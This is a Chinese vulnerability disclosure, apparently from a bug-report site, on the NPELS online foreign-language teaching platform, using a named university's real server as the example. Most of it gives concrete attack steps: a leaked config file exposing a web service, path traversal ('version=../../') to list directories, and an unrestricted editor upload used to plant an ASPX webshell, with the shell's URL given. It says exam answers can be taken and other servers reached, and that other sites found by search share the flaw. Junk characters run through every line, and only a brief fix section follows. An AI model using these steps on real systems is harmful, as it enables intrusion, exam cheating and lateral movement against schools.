好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
9 e% v I. S# {" G* o f3 P' \4 X! F. i, W+ h Z
详细说明:3 V1 U d) D- B- ^0 k
! O" G( [, h2 w9 u: k
以南开大学的为例:
% s2 g! p' Q! a$ Xhttp://222.30.60.3/NPELS" h( Q/ Q: z. V% j4 F9 ~5 }8 u
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
: o& R3 l4 N" H" m<setting name="Update_CommonSvr_CommonService" serializeAs="String">
( W( }% b! `3 B5 i; H2 n0 d<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
( P' D O0 O0 `5 i) O& c</setting>* @- v5 E4 u. c/ O$ r4 u
及版本号8 g* Q ?0 @# x( V& v4 }
<add key="TVersion" value="1, 0, 0, 2187">
( ^. S# Y: |) W! q1 Z</add>7 A; t6 i {2 i; {5 Y7 }9 M
直接访问
1 T; @( B! y+ L7 }http://222.30.60.3/NPELS/CommonService.asmx8 I5 A1 M) |* u0 y
使用GetTestClientFileList操作,直接 HTTP GET 列目录:" ?* x- e8 [3 o2 V$ ?
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21877 I& c" [' l% ?+ Y8 n
进一步列目录(返回的网页很大,可以直接 wget 下来)% B1 d2 a# ~' P3 @6 p
http://222.30.60.3/NPELS/CommonS ... List?version=../../: v9 K9 P0 n; D$ {3 m7 R5 s/ R
. D: F" A( E7 H8 M4 Y/ j" i9 d
发现: w3 W( |+ [0 y
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm: U; I e, A4 V/ z$ M
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头6 \2 H& f t) c4 O q8 P9 k5 T
上传后继续列目录找到木马地址直接访问即可
& n& X% n- b* p2 u
( P0 q+ [; i8 Z" x' Q0 I ]OOXX
8 R! x+ l! K1 |! M+ Y$ i0 P2 _
: H# ?; G8 N7 l w7 W7 a, |Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法& ?1 M' f9 ]) T
漏洞证明:; O, u" }* x; t/ `: \
) x6 }) t' T" y2 t9 U列目录:
: F) ]+ f: i: e$ |) b$ J3 W$ _http://222.30.60.3/NPELS/CommonS ... List?version=../../
* i4 D/ X! n/ |文件上传:
' e6 U& c% S" |http://222.30.60.3/npelsv/editor/editor.htm
p e( ^/ J, j u, m8 y
$ P+ J# d- A# h, c+ _# |8 C* T上传木马:7 H- e3 W. q& B* [. O
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx# ] ~) l/ _9 F$ P6 X9 a
) d! t3 q4 |& c2 ^, {( i
修复方案:2 U. \' U" p7 d5 H% A
好像考试系统必须使用 CommonService.asmx
" d) G& T; N; q; F' C4 U* Y5 c8 s最好配置文件加密或者用别的方式不让它泄露出来) S/ K( a% \/ q" `5 p, N# W M
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
0 S' r) o8 y7 ]. S |